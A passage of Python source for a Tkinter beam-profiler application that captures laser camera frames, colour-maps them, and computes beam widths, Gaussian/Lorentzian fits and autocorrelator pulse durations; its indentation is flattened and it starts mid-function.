a21 = data.index.values.sum()
a22 = data.index.values.sum()**2
a23 = data.index.values.sum()**3
a31 = data.index.values.sum()**2
a32 = data.index.values.sum()**3
a33 = data.index.values.sum()**4
b11 = np.sum(np.log(data.values+1))
b12 = np.sum(data.index.values*np.log(data.values+1).T)
b13 = np.sum(data.index.values**2*np.log(data.values+1).T)
#A = np.array([[a11,a12,a13],[a21,a22,a23],[a31,a32,a33]])
#B = np.array([b11,b12,b13])
#X= solve(A,B)
#Ainv = np.linalg.inv(A)
#X = np.dot(Ainv,B)
#X = np.linalg.solve(A,B)
a,b,c = sym.symbols("a b c")
eqn1 = a11*a + a12*b + a13*c - b11
eqn2 = a21*a + a22*b + a23*c - b12
eqn3 = a31*a + a32*b + a33*c - b13
#X = solve()
X = sym.solve([eqn1,eqn2,eqn3])
#print(X)
return X
def sigmoid(x, gain=1, offset_x=0):
return (255*(np.tanh(((1/100*x+offset_x)*gain)/2)+1)/2)
def color_R(x):
if x >= 80:
red = 255*(np.tanh(1/20*((x-35)*2-255)/2)+1)/2
elif 30 < x < 80:
red = -100*(np.tanh(1/5*((x+70)*2-255)/2)+1)/2+100
elif x <= 30 :
red = 100*(np.tanh(1/5*((x+110)*2-255)/2)+1)/2
return red
def color_G(x):
if x < 148:
green = 255*(np.tanh(1/20*((x+30)*2-255)/2)+1)/2
elif 148 <= x < 220:
green = -255*(np.tanh(1/20*((x-70)*2-255)/2)+1)/2+255
elif x >= 220:
green = 225*(np.tanh(1/5*((x-107)*2-255)/2)+1)/2+30
return green
def color_B(x):
if 200 > x > 45:
blue = -255*(np.tanh(1/20*((x-5)*2-255)/2)+1)/2+255
elif 45 >= x:
blue = 255*(np.tanh(1/10*((x+105)*2-255)/2)+1)/2
elif x >= 200:
blue = 255*(np.tanh(1/5*((x-90)*2-255)/2)+1)/2
return blue
def beam_color(img):
#color_data = [color_RGB(x*1/256) for x in range(0,256)]
#color_data = np.array(color_data)
#color_data = color_data*255
#color_data = np.array(color_data, dtype="uint8")
#color_data_list = list(color_data)
#color_data = list(color_data)
#look_up_table_color = np.ones((256, 1), dtype = 'uint8' ) * 0
#for i in range(256):
#img_r = np.empty((1,256), np.uint8)
lut_r = np.ones((256, 1), dtype = 'uint8' ) * 0
lut_g = np.ones((256, 1), dtype = 'uint8' ) * 0
lut_b = np.ones((256, 1), dtype = 'uint8' ) * 0
for i in range(256):
lut_r[i][0] = CV2.color_R(i)
lut_g[i][0] = CV2.color_G(i)
lut_b[i][0] = CV2.color_B(i)
img_r = cv2.LUT(img, lut_r)
img_g = cv2.LUT(img, lut_g)
img_b = cv2.LUT(img, lut_b)
img_bgr = cv2.merge((img_b, img_g, img_r))
img_rgb = cv2.merge((img_r, img_g, img_b))
return img_bgr, img_rgb
def pause_plot(xdata, ydata):
fig, ax = plt.subplots(1, 1)
x = xdata
y = ydata
lines = ax.plot(x, y)
return lines
def knife_edge(img, axis, from_, to_, unit): #axis Xใ0, Yใ1
img_sum = np.sum(img)
img_line_sum = np.sum(img, axis=axis)
line_sum = []
line_value = []
for i in np.arange(0, len(img_line_sum), 1):
line_value = np.append(line_value, img_line_sum[i])
line_sum = np.append(line_sum, np.sum(line_value))
knifeedge_data = line_sum/img_sum
knifeedge_data = pd.Series(knifeedge_data)
knifeedge_size_0 = knifeedge_data.iloc[knifeedge_data.sub(from_).abs().argsort()[:1]]
knifeedge_size_1 = knifeedge_data.iloc[knifeedge_data.sub(to_).abs().argsort()[:1]]
#knifeedge_size_index = list(knifeedge_size_0.index)
knifeedge_size = np.array(knifeedge_size_1.index) - np.array(knifeedge_size_0.index)
knifeedge_size_actual = CV2.from_pixel_to_beam_width(int(knifeedge_size), unit)
return knifeedge_size_actual
#line = []
#line_list = []
#for i in np.arange(0, len(line_sum)-1, 1):
#line = line_sum[i+1] - line_sum[i]
#line_list = np.append(line_list, line)
def beam_intensity_img(img, linedata, axis): #axis Xใฏ0 Yใฏ1
linedata = linedata * 255
linedata = np.array(linedata, dtype="uint8")
drawline_data = []
for i in np.arange(0, len(linedata), 1):
if axis == 0:
drawline_data = np.append(drawline_data,[i,img.shape[axis]-linedata[i]])
elif axis == 1:
drawline_data = np.append(drawline_data,[linedata[i],i])
drawline_data = np.array(drawline_data, dtype="int")
drawline_data = drawline_data.reshape(-1,1,2)
img = cv2.polylines(img, [drawline_data], False, color=255, thickness=2)
img = np.array(img, dtype="uint8")
return img
class GUI:
def setup():
global fig1,fig2
global ax1,ax2
global canvas1,canvas2
global imgcanvas,imgcap
global root,subframe
global Static2,Static3,Static4
global Static21,Static22,Static31,Static32,Static41,Static42
global Static_a11,Static_a21
global barcanvas,barimg
global fnamebox
global exposuretimebox
global verticalslider,horizontalslider
global varv,varh
global testcanvas,dxbox
global autocorrelator_
global width, height
global frame2
global func
global X_peak_position,Y_peak_position
root = tk.Tk()
root.title("BeamProfiler")
#resolution = "%sx%s" % (screenwidth, screenheight)
resolution = "1280x720"
if resolution == "1920x1080":
root.geometry("1920x1080")
width = 640
#height = 512
height = 480
elif resolution in ("1366x768", "1600x900", "1280x720"):
root.geometry("1280x720")
width = int(640/4*3)
#height = int(512/4*3)
height = int(480/4*3)
mainframe = ttk.Frame(root, height=800, width=800)
mainframe.grid(row=1, column=1, sticky="n", pady=10)
imgcanvas = tk.Canvas(mainframe, width=width, height=height)
imgcanvas.grid(row=1, column=3, sticky="n", pady=25)
imgcap = tk.Label(imgcanvas)
imgcap.grid(row=1, column=3, sticky="n", pady=25)
fig1 = Figure(figsize=(9, 3), dpi=70)
fig1.subplots_adjust(bottom=0.4)
ax1 = fig1.add_subplot(111)
ax1.set_xlabel("Beam width (px)")
ax1.set_ylabel("Intensity (arb.units)")
fig2 = Figure(figsize=(3, 7), dpi=70)
fig2.subplots_adjust(top=0.9,bottom=0.15,left=0.3)
fig2.patch.set_alpha(0)
ax2 = fig2.add_subplot(111)
#fig2.tight_layout()
ax2.set_xlabel("Beam width (px)",labelpad=None)
ax2.set_ylabel("Intensity (arb.units)",labelpad=None)
canvas1 = FigureCanvasTkAgg(fig1, master=mainframe)
canvas1.get_tk_widget().grid(column=3, row=2, sticky="n")
canvas1._tkcanvas.grid(column=3, row=2, sticky="n")
#canvas1.get_tk_widget().place(x=300, y=300)
#canvas1._tkcanvas.place(x=300, y=300)
canvas2 = FigureCanvasTkAgg(fig2, master=mainframe)
canvas2.get_tk_widget().grid(column=1, row=1, padx=20, sticky="n")
canvas2._tkcanvas.grid(column=1, row=1, padx=20, sticky="n")
#barcanvas = tk.Canvas(mainframe, width=25, height=510)
#barcanvas.grid(row=1, column=2)
#barimg = tk.Label(barcanvas)
#barimg.grid(row=1, column=2)
#get_variable = tk.IntVar()
horizontalslider = ttk.Scale(mainframe, from_=0, to=cam_res_w-1, length=510, orient="h")
horizontalslider.place(x=310, y=420)
verticalslider = ttk.Scale(mainframe, from_=cam_res_h-1, to=0, length=365, orient="v")
verticalslider.place(x=280,y=50)
subframe = ttk.Frame(root, height=600, width=500)
subframe.grid(row=1, column=4, sticky="nw")
frame1 = ttk.Frame(subframe, height=180, width=100)
frame1.grid(row=1, column=1, sticky="nw", pady=30)
frame11 = ttk.Frame(frame1, height=60, width=100)
frame11.grid(row=1, column=1, sticky="nw", pady=20)
frame12 = ttk.Frame(frame1, height=60, width=100)
frame12.grid(row=2, column=1, sticky="n", pady=10)
frame13 = ttk.Frame(frame1, height=60, width=100)
frame13.grid(row=3, column=1, sticky="nw", pady=10)
Static1 = ttk.Label(frame11, text='BeamWidth', font=("",10,"bold"))
Static1.grid(row=1, column=1 ,sticky="w", pady=0)
Static11 = ttk.Label(frame11, text='X', font=("",10,"bold"))
Static11.grid(row=1, column=2, padx=20)
Static12 = ttk.Label(frame11, text='Y', font=("",10,"bold"))
Static12.grid(row=1, column=3 ,padx=20)
Static2 = ttk.Label(frame11, text='13.5% of peak (px)', font=("",10,"bold"))
Static2.grid(row=2, column=1,sticky="w")
Static3 = ttk.Label(frame11, text='50.0% of peak (px)', font=("",10,"bold"))
Static3.grid(row=3, column=1,sticky="w")
Static4 = ttk.Label(frame11, text='Peak position (px)', font=("",10,"bold"))
Static4.grid(row=4, column=1,sticky="w")
#Static4 = ttk.Label(frame11, text='knife edge 10/90 (mm)', font=("",10,"bold"))
#Static4.grid(row=4, column=1)
#Static5 = ttk.Label(frame11, text='knife edge 20/80 (mm)', font=("",10,"bold"))
#Static5.grid(row=5, column=1)
X_size_e2, Y_size_e2 = 0,0
X_size_FWHM, Y_size_FWHM = 0,0
X_peak_position, Y_peak_position = 0,0
#X_knife_edge_10_90, Y_knife_edge_10_90 = 0,0
#X_knife_edge_20_80, Y_knife_edge_20_80 = 0,0
style = ttk.Style()
style.configure("style.TButton", font=("",10,"bold"))
Static21 = ttk.Label(frame11, text=X_size_e2, font=("",10,"bold"))
Static21.grid(row=2, column=2)
Static22 = ttk.Label(frame11, text=Y_size_e2, font=("",10,"bold"))
Static22.grid(row=2, column=3)
Static31 = ttk.Label(frame11, text=X_size_FWHM, font=("",10,"bold"))
Static31.grid(row=3, column=2)
Static32 = ttk.Label(frame11, text=Y_size_FWHM, font=("",10,"bold"))
Static32.grid(row=3, column=3)
Static41 = ttk.Label(frame11, text=X_peak_position, font=("",10,"bold"))
Static41.grid(row=4, column=2)
Static42 = ttk.Label(frame11, text=Y_peak_position, font=("",10,"bold"))
Static42.grid(row=4, column=3)
#Static41 = ttk.Label(frame11, text=X_knife_edge_10_90, font=("",10,"bold"))
#Static41.grid(row=4, column=2)
#Static42 = ttk.Label(frame11, text=Y_knife_edge_10_90, font=("",10,"bold"))
#Static42.grid(row=4, column=3)
#Static51 = ttk.Label(frame11, text=X_knife_edge_20_80, font=("",10,"bold"))
#Static51.grid(row=5, column=2)
#Static52 = ttk.Label(frame11, text=Y_knife_edge_20_80, font=("",10,"bold"))
#Static52.grid(row=5, column=3)
folderbutton = ttk.Button(frame12, text="Save as", command=GUI_menu.savefile, style="style.TButton")
folderbutton.grid(row=3, column=3)
fnamebox = ttk.Entry(frame12, width=40)
fnamebox.grid(row=3, column=1, columnspan=2)
#darkbutton = ttk.Button(frame12, text="Offset", command=GUI.dark, style="style.TButton")
#darkbutton.grid(row=2, column=3)
#exposuretimelabel = ttk.Label(frame12, text="Exposuretime (ms)", font=("",10,"bold"))
#exposuretimelabel.grid(row=1, column=1, sticky="w")
#exposuretimebox = ttk.Spinbox(frame12, from_=0.1, to=100, increment=0.1)
#exposuretimebox.grid(row=2, column=1, pady=10, sticky="w")
#exposuretimebutton = ttk.Button(frame12, text="Set", command=GUI.exposure_time, style="style.TButton")
#exposuretimebutton.grid(row=2, column=2, pady=10, sticky="w")
#trackingbutton = ttk.Button(frame13, text="Tracking", command=GUI.tracking_button, style="style.TButton")
#trackingbutton.grid(row=1, column=2, rowspan=2, padx=20)
if "C1284R13C" in cam_name or "C1285R12M" in cam_name:
triggerbutton = ttk.Button(frame13, text="Trigger", command=GUI.trigger, style="style.TButton")
triggerbutton.grid(row=1, column=3, rowspan=2, padx=20)
#style.configure("style.TCheckbutton", font=("",10,"bold"))
#varv = tk.BooleanVar()
#verticalsliderbutton = ttk.Checkbutton(frame13, text="Horizontal slider", variable=varv, command=GUI.vsliderbutton, style="style.TCheckbutton")
#verticalsliderbutton.grid(row=2, column=1, sticky="w")
#varh = tk.BooleanVar()
#horizontalsliderbutton = ttk.Checkbutton(frame13, text="Vertical slider", variable=varh, command=GUI.hsliderbutton, style="style.TCheckbutton")
#horizontalsliderbutton.grid(row=1, column=1, sticky="w")
#testcanvas = ttk.Notebook(root, width=730, height=1000)
#testcanvas.grid(row=1, column=4, rowspan=3)
frame2 = ttk.Frame(subframe, height=800, width=300)
frame2.grid(row=2, column=1, sticky="nw")
frame21 = ttk.Frame(frame2, height=60, width=300)
frame21.grid(row=1, column=1, sticky="nw", pady=10)
startbutton = ttk.Button(frame21, text="Base", command=GUI.calculate, style="style.TButton")
startbutton.grid(row=1, column=1, padx=10, sticky="nw")
dxbox = ttk.Entry(frame21, width=10)
dxbox.grid(row=1, column=2, sticky="n")
dxlabel = ttk.Label(frame21, text="mm", font=("",10,"bold"))
dxlabel.grid(row=1, column=3, sticky="n")
dxbutton = ttk.Button(frame21, text="Second", command=GUI.autocorrelator, style="style.TButton")
dxbutton.grid(row=1, column=4, padx=10, sticky="n")
acsavebutton = ttk.Button(frame21, text="Save", command=GUI_menu.acsavefile, style="style.TButton")
acsavebutton.grid(row=1, column=5, padx=10, sticky="n")
FWHM_t = 0
#pix2 = 0
autocorrelator_ = 0
func = "gaussian"
frame3 = ttk.Frame(subframe, height=180, width=300)
frame3.grid(row=1, column=2, sticky="nw", pady=10)
Static_a11 = ttk.Label(frame3, text="%s fs" % FWHM_t, font=("",80,"bold"))
Static_a11.grid(row=1, column=1, sticky="nw", padx=10)
#Static_a21 = ttk.Label(frame3, text=pix2)
#Static_a21.place(x=1300, y=500)
def cam_setup():
global cap,cam,cam_name
global frame
global exposuretime
try:
cam = uc480.UC480_Camera()
except:
pass
cam_name = cam.model
cam_name = str(cam_name)
cam.start_capture()
#frame = cam.grab_image(timeout='None', copy=True,width=640,height=480)
exposuretime = "0.2ms"
frame = cam.start_live_video(framerate=None, exposure_time=exposuretime)
#frame = cam.get_captured_image(timeout='10s', copy=True)
#camera_id = 1
#cap = cv2.VideoCapture(camera_id)
#cap.set(cv2.CAP_PROP_AUTO_EXPOSURE, 0.25)
#cap.set(cv2.CAP_PROP_EXPOSURE, shutterspeed)
#cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
#cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
time.sleep(1)
def cam_setup_test(camera_id):
global cam, cam_name, cam_res
global cam_res_w, cam_res_h
global exposuretime
cam = cv2.VideoCapture(camera_id)
cam_res = "1024x768"
cam_res = cam_res.split("x")
cam_res_w = int(cam_res[0])
cam_res_h = int(cam_res[1])
#cam_res_w = 1024
#cam_res_h = 768
#cam.set(cv2.CAP_PROP_AUTO_EXPOSURE, -1)
exposuretime = -5
cam.set(cv2.CAP_PROP_EXPOSURE, exposuretime)
#print(cam.get(cv2.CAP_PROP_EXPOSURE))
#cam_res_w = cam.get(cv2.CAP_PROP_FRAME_WIDTH)
#cam_res_h = cam.get(cv2.CAP_PROP_FRAME_HEIGHT)
#print(cam_res_w, cam_res_h)
cam.set(cv2.CAP_PROP_FRAME_WIDTH, cam_res_w)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_res_h)
ret, frame = cam.read()
frame = cv2.flip(frame, 1)
cam_name = "test"
time.sleep(1)
def cam_select():
cam_list = []
for i in np.arange(0, 6, 1):
cam = cv2.VideoCapture(i)
if cam.isOpened() == True:
cam_list.append(i)
elif cam.isOpened() == False:
pass
return cam_list
def beamprofiler_img():
global frame,img,img_norm
global X,Y
global beamimg,beamimg_save,barimg_save,save_img
global dark,trackingon
#ret, frame = cam.read()
#frame = cam.get_captured_image(timeout='10s', copy=True)
#frame = cam.latest_frame(copy=True)
#frame = cv2.flip(frame, 1)
if "C1284R13C" in cam_name:
frame = cam.latest_frame(copy=True)
frame = cv2.flip(frame, 1)
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
elif "C1285R12M" in cam_name:
frame = cam.latest_frame(copy=True)
frame = cv2.flip(frame, 1)
img = frame
elif "test" in cam_name:
ret, frame = cam.read()
frame = cv2.flip(frame, 1)
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
img_norm = CV2.beam_normalize(img)
X, Y = CV2.beam_row_columns(img, img_norm)
if trackingon == 1:
trackingimg, X, Y = CV2.tracking(img_norm)
img_norm = trackingimg
img_beamintensity = img_norm * 255
img_beamintensity = np.array(img_beamintensity, dtype="uint8")
img_beamintensity = CV2.beam_intensity_img(img_beamintensity, X, 0)
img_beamintensity = CV2.beam_intensity_img(img_beamintensity, Y, 1)
#img_beamintensity = cv2.putText(img_beamintensity, "100", (10,500), color=0, fontFace= cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.5, thickness=2)
beamimg_save,beamimg = CV2.beam_color(img_beamintensity)
#beamimg_save,_ = CV2.beam_color(save_img)
beam_img = cv2.resize(beamimg,(width,height))
barimg_save,bar_img = GUI.colorbar()
beam_img = cv2.hconcat([beam_img,bar_img])
beam_img = Image.fromarray(beam_img)
beam_img_tk = ImageTk.PhotoImage(image=beam_img, master=imgcanvas)
imgcap.beam_img_tk = beam_img_tk
beam_img = imgcap.configure(image=beam_img_tk)
imgcap.after(100, GUI.beamprofiler_img)
def plotter():
global fig1,fig2
global ax1,ax2
global canvas1,canvas2
global X,Y
global realsize_X, realsize_Y
ax1.cla()
ax2.cla()
state = var.get()
if state == 0:
ax1.plot(X.index.values, X.values)
ax1.set_xlabel("Beam width (px)")
ax1.set_xlim(0,cam_res_w)
ax1.set_xticks(np.arange(0,cam_res_w+1,100))
elif state == 1:
realsize_X = CV2.pixel_to_realsize(X, "mm")
ax1.plot(realsize_X, X.values)
ax1.set_xlabel("Beam width (mm)")
ax1.set_xlim(0,realsize_X[cam_res_w-1])
#ax1.set_xticks(np.arange(0,realsize_X[cam_res_h-1]+1,100))
elif state == 2:
realsize_X = CV2.pixel_to_realsize(X, "um")
ax1.plot(realsize_X, X.values)
ax1.set_xlabel("Beam width (um)")
ax1.set_xlim(0,realsize_X[cam_res_w-1])
ax1.set_ylabel("Intensity (arb.units)")
ax1.set_ylim(0,1.2)
ax1.set_yticks(np.arange(0,1.2+0.2,0.2))
YY = Y.iloc[::-1]
if state == 0:
ax2.plot(YY.values, Y.index.values)
ax2.set_ylabel("Beam width (px)",labelpad=None)
ax2.set_ylim(0,cam_res_h)
ax2.set_yticks(np.arange(0,cam_res_h+1,100))
elif state == 1:
realsize_Y = CV2.pixel_to_realsize(YY, "mm")
realsize_Y.reverse()
ax2.plot(YY.values, realsize_Y)
ax2.set_ylabel("Beam width (mm)",labelpad=None)
ax2.set_ylim(0,realsize_Y[cam_res_h-1])
#ax2.set_yticks(np.arange(0,realsize_Y[cam_res_h-1]+1,100))
elif state == 2:
realsize_Y = CV2.pixel_to_realsize(YY, "um")
realsize_Y.reverse()
ax2.plot(YY.values, realsize_Y)
ax2.set_ylabel("Beam width (um)",labelpad=None)
ax2.set_ylim(0,realsize_Y[cam_res_h-1])
ax2.set_xlabel("Intensity (arb.units)",labelpad=None)
ax2.set_xlim(0,1.2)
ax2.set_xticks(np.arange(0,1.2+0.2,0.2))
canvas1.draw()
canvas2.draw()
root.after(100, GUI.plotter)
def beam_width():
global X_peak_position, Y_peak_position
global X_size_e2,Y_size_e2
global X_size_FWHM,Y_size_FWHM
global X_knife_edge_10_90,Y_knife_edge_10_90
global X_knife_edge_20_80,Y_knife_edge_20_80
global knifeedge_count
X_peak = CV2.beam_peak(X)
Y_peak = CV2.beam_peak(Y)
try:
X_size_e2_px = CV2.beam_size(X, X_peak, 1/np.exp(2))
Y_size_e2_px = CV2.beam_size(Y, Y_peak, 1/np.exp(2))
X_size_FWHM_px = CV2.beam_size(X, X_peak, 0.5)
Y_size_FWHM_px = CV2.beam_size(Y, Y_peak, 0.5)
except:
pass
state = var.get()
if state == 0:
Static2.configure(text='13.5% of peak (px)', font=("",10,"bold"))
Static3.configure(text='50.0% of peak (px)', font=("",10,"bold"))
Static4.configure(text='Peak position (px)', font=("",10,"bold"))
X_size_e2 = X_size_e2_px
Y_size_e2 = Y_size_e2_px
X_size_FWHM = X_size_FWHM_px
Y_size_FWHM = Y_size_FWHM_px
X_peak_position = X_peak
Y_peak_position = Y_peak
elif state == 1:
Static2.configure(text='13.5% of peak (mm)', font=("",10,"bold"))
Static3.configure(text='50.0% of peak (mm)', font=("",10,"bold"))
Static4.configure(text='Peak position (mm)', font=("",10,"bold"))
X_size_e2 = CV2.from_pixel_to_beam_width(X_size_e2_px, "mm")
Y_size_e2 = CV2.from_pixel_to_beam_width(Y_size_e2_px, "mm")
X_size_FWHM = CV2.from_pixel_to_beam_width(X_size_FWHM_px, "mm")
Y_size_FWHM = CV2.from_pixel_to_beam_width(Y_size_FWHM_px, "mm")
X_peak_position = CV2.from_pixel_to_beam_width(X_peak, "mm")
Y_peak_position = CV2.from_pixel_to_beam_width(Y_peak, "mm")
elif state == 2:
Static2.configure(text='13.5% of peak (um)', font=("",10,"bold"))
Static3.configure(text='50.0% of peak (um)', font=("",10,"bold"))
Static4.configure(text='Peak position (um)', font=("",10,"bold"))
X_size_e2 = CV2.from_pixel_to_beam_width(X_size_e2_px, "um")
Y_size_e2 = CV2.from_pixel_to_beam_width(Y_size_e2_px, "um")
X_size_FWHM = CV2.from_pixel_to_beam_width(X_size_FWHM_px, "um")
Y_size_FWHM = CV2.from_pixel_to_beam_width(Y_size_FWHM_px, "um")
X_peak_position = CV2.from_pixel_to_beam_width(X_peak, "um")
Y_peak_position = CV2.from_pixel_to_beam_width(Y_peak, "um")
else:
pass
Static21.configure(text=X_size_e2, font=("",10,"bold"))
Static22.configure(text=Y_size_e2, font=("",10,"bold"))
Static31.configure(text=X_size_FWHM, font=("",10,"bold"))
Static32.configure(text=Y_size_FWHM, font=("",10,"bold"))
Static41.configure(text=X_peak_position, font=("",10,"bold"))
Static42.configure(text=Y_peak_position, font=("",10,"bold"))
#knifeedge_count = knifeedge_count + 1
#if knifeedge_count == 2:
#X_knife_edge_10_90 = CV2.knife_edge(img, 0, 0.1, 0.9)
#Y_knife_edge_10_90 = CV2.knife_edge(img, 1, 0.1, 0.9)
#X_knife_edge_20_80 = CV2.knife_edge(img, 0, 0.2, 0.8)
#Y_knife_edge_20_80 = CV2.knife_edge(img, 1, 0.2, 0.8)
#Static41.configure(text=X_knife_edge_10_90, font=("",10,"bold"))
#Static42.configure(text=Y_knife_edge_10_90, font=("",10,"bold"))
#Static51.configure(text=X_knife_edge_20_80, font=("",10,"bold"))
#Static52.configure(text=Y_knife_edge_20_80, font=("",10,"bold"))
#knifeedge_count = 0
#if autocorrelator_ == 1:
#pix2 = X_peak
#Static_a21.configure(text=pix2)
root.after(100, GUI.beam_width)
def colorbar():
num = np.linspace(255,0,256,dtype="uint8")
num = np.tile(num,(25,1))
barimg_bgr,barimg_rbg = CV2.beam_color(num.T)
#bar_img = cv2.resize(bar_img, dsize=None, fx=1, fy=1.5)
barimg_bgr = cv2.resize(barimg_bgr, dsize=(40, cam_res_h))
barimg_rbg = cv2.resize(barimg_rbg, dsize=(25, height))
#bar_img = Image.fromarray(bar_img)
#bar_img_tk = ImageTk.PhotoImage(image=bar_img, master=barcanvas)
#barimg.bar_img_tk = bar_img_tk
#barimg = barimg.configure(image=bar_img_tk)
return barimg_bgr, barimg_rbg
def dark():
global dark,dark_data
dark = 1
#dark_data = img
def dark_offset():
global dark_data, dark
if dark == 1:
#tkmsg.showinfo("Info", "Please wait a moment")
GUI.waitdialog("Wait a moment")
dark_data = img
dark = dark + 1
elif 2 <= dark < 20:
dark_data = np.dstack([dark_data, img])
dark = dark + 1
elif dark == 20:
dark_data = np.dstack([dark_data, img])
dark_data = dark_data.mean(axis=2)
dark = dark + 1
try:
msgdialog.destroy()
except:
pass
else:
pass
def waitdialog(message):
global msgdialog
msgdialog = tk.Toplevel(root)
msgdialog.transient()
msgdialog.title('Info')
tk.Label(msgdialog, text=message, font=("",20,"bold")).grid(padx=20, pady=20)
return msgdialog
def exposure_time():
global exposuretime
exposuretime = exposuretimebox.get()
if "C1284R13C" in cam_name or "C1285R12M" in cam_name:
cam.stop_live_video()
cam.start_live_video(framerate=None, exposure_time="%s ms" % exposuretime)
time.sleep(0.5)
elif "test" in cam_name:
cam.set(cv2.CAP_PROP_AUTO_EXPOSURE, 0.25)
cam.set(cv2.CAP_PROP_EXPOSURE,float(exposuretime))
time.sleep(0.5)
def trigger():
cam.stop_live_video()
#cam.set_trigger(mode='hardware', edge='rising')
cam.blacklevel_offset
cam.start_live_video(framerate=None)
time.sleep(0.5)
def tracking_button():
global trackingon
if trackingon == 0:
trackingon = 1
elif trackingon == 1:
trackingon = 0
def hsliderbutton():
if varh.get() == True:
horizontalslider.set(numcolumn)
def vsliderbutton():
if varv.get() == True:
verticalslider.set(cam_res_h-1-numrow)
def fittingfunc(x,mu,sigma):
if func == "gaussian":
return np.exp(-(x-mu)**2 / (2.0*sigma**2))
elif func == "lorentz":
return sigma**2/(4*(x-mu)**2+sigma**2)
def scipy_fit(xdata,ydata):
X = np.ravel(xdata)
Y = np.ravel(ydata)
def fittingfunc(x,mu,sigma):
if func == "gaussian":
return np.exp(-(x-mu)**2 / (2.0*sigma**2))
elif func == "lorentz":
return sigma**2/(4*(x-mu)**2+sigma**2)
params,cov = scipy.optimize.curve_fit(fittingfunc,X,Y)
return params
def autocorrelator_graph():
global fig3,fig4
global ax3,ax4
fig3 = Figure(figsize=(6, 3), dpi=70)
fig3.subplots_adjust(bottom=0.2)
ax3 = fig3.add_subplot(111)
ax3.set_xlabel("Beam width (px)")
ax3.set_ylabel("Intensity (arb.units)")
ax3.set_xlim(0,cam_res_w)
ax3.set_ylim(0,1.2)
ax3.set_xticks(np.arange(0,cam_res_w+1,100))
ax3.set_yticks(np.arange(0,1.2+0.2,0.2))
fig4 = Figure(figsize=(6, 3), dpi=70)
fig4.subplots_adjust(bottom=0.2)
ax4 = fig4.add_subplot(111)
ax4.set_xlabel("Time (s)")
ax4.set_ylabel("Intensity (arb.units)")
#ax4.set_xlim(0,1280)
#ax4.set_ylim(0,1.2)
#ax4.set_xticks(np.arange(0,1280+1,100))
#ax4.set_yticks(np.arange(0,1.2+0.2,0.2))
def calculate():
global pix1, pix2, pix, X_gaussian
global acdata1, acdata2
pix1 = 0
if pix1 == False:
ax3.cla()
ax3.plot(X.index.values, X.values)
X_peak = CV2.beam_peak(X)
Y_peak = CV2.beam_peak(Y)
if pix1 == False:
#pix1 = X_peak
pix = X.index.values
X_data, Y_data = CV2.beam_intensity(X, Y, X_peak, Y_peak)
params = GUI.scipy_fit(X_data.index.values, X_data.values)
X_gaussian = GUI.fittingfunc(X_data.index.values, params[0], params[1])
X_gaussian = pd.Series(X_gaussian)
try:
acdata1
except:
acdata1 = []
acdata2 = beamimg_save
acdata1 = pd.DataFrame({"Normalized(original)":pd.Series(X), "Fitting(original)":X_gaussian})
pix1 = CV2.beam_peak(X_gaussian)
#pix1_peak = X_gaussian.max
#pix1_size = CV2.beam_size_(X_gaussian, pix1_peak, 1/2**0.5)
ax3.plot(X.index.values, X_gaussian.values)
ax3.set_xlabel("Beam width (px)")
ax3.set_ylabel("Intensity (arb.units)")
ax3.set_xlim(0,cam_res_w)
ax3.set_ylim(0,1.2)
ax3.set_xticks(np.arange(0,cam_res_w+1,200))
ax3.set_yticks(np.arange(0,1.2+0.2,0.2))
canvas3 = FigureCanvasTkAgg(fig3, master=frame2)
canvas3.get_tk_widget().grid(row=2, column=1)
canvas3._tkcanvas.grid(row=2, column=1)
canvas3.draw()
#X_data, Y_data = CV2.beam_intensity(X, Y, X_peak, Y_peak)
#params = GUI.scipy_fit(X_data.index.values, X_data.values)
#X_gaussian_2 = GUI.gaussian_fit(X_data.index.values, params[0], params[1])
#X_gaussian_2 = pd.Series(X_gaussian_2)
#pix2 = CV2.beam_peak(X_gaussian_2)
#acdata3 = pd.DataFrame({"Normalized(Second)":pd.Series(X), "Fitting(Second)":X_gaussian_2})
#acdata1 = pd.concat([acdata1,acdata3], axis=1)
#pix2_peak = X_gaussian_2.max
#pix2 = CV2.beam_size_(X_gaussian_2, pix2, 1/2**0.5)
#time.sleep(0.5)
def autocorrelator():
global t,FWHM_t
global autocorrelator_,pix2
global acdata1, acdata4
X_peak = CV2.beam_peak(X)
Y_peak = CV2.beam_peak(Y)
X_data, Y_data = CV2.beam_intensity(X, Y, X_peak, Y_peak)
params = GUI.scipy_fit(X_data.index.values, X_data.values)
X_gaussian_2 = GUI.fittingfunc(X_data.index.values, params[0], params[1])
X_gaussian_2 = pd.Series(X_gaussian_2)
pix2 = CV2.beam_peak(X_gaussian_2)
acdata3 = pd.DataFrame({"Normalized(Second)":pd.Series(X), "Fitting(Second)":X_gaussian_2})
acdata1 = pd.concat([acdata1,acdata3], axis=1)
acdata4 = beamimg_save
dpix = abs(pix1-pix2)
dx = dxbox.get()
if func == "gaussian":
data = 2*float(dx)*10**(-3)/(299792458*dpix)
elif func == "lorentz":
data = 1/np.sqrt(2)*float(dx)*10**(-3)/(299792458*dpix)
t = pix*data
ax4.cla()
ax4.plot(t, X_gaussian)
ax4.set_xlabel("Time (s)")
ax4.set_ylabel("Intensity (arb.units)")
#ax4.set_xlim(0,1280)
ax4.set_ylim(0,1.2)
#ax4.set_xticks(np.arange(0,1280+1,200))
ax4.set_yticks(np.arange(0,1.2+0.2,0.2))
canvas4 = FigureCanvasTkAgg(fig4, master=frame2)
canvas4.get_tk_widget().grid(row=3, column=1)
canvas4._tkcanvas.grid(row=3, column=1)
X_gaussian_ = pd.Series(X_gaussian)
FWHM = CV2.beam_size(X_gaussian_,pix1,1/2**0.5)
FWHM_t = FWHM * data * 10**15
FWHM_t = round(FWHM_t, 1)
Static_a11.configure(text="%s fs" % FWHM_t, font=("",80,"bold"))
FWHM_t = pd.DataFrame([FWHM_t], columns=["Pulse duration (fs)"])
acdata1 = pd.concat([acdata1,FWHM_t], axis=1)
autocorrelator_ = 1
class GUI_menu:
def mainmenu():
mainmenu = tk.Menu(root)
root.config(menu=mainmenu)
filemenu = tk.Menu(mainmenu, tearoff=0)
mainmenu.add_cascade(label="File", menu=filemenu)
filemenu.add_command(label="Save as", command=GUI_menu.savefile)
filemenu.add_command(label="Quit", command=GUI_menu.menu_quit)
#filemenu.add_separator()
toolsmenu = tk.Menu(mainmenu, tearoff=0)
#settingsmenu = tk.Menu(toolsmenu, tearoff=0)
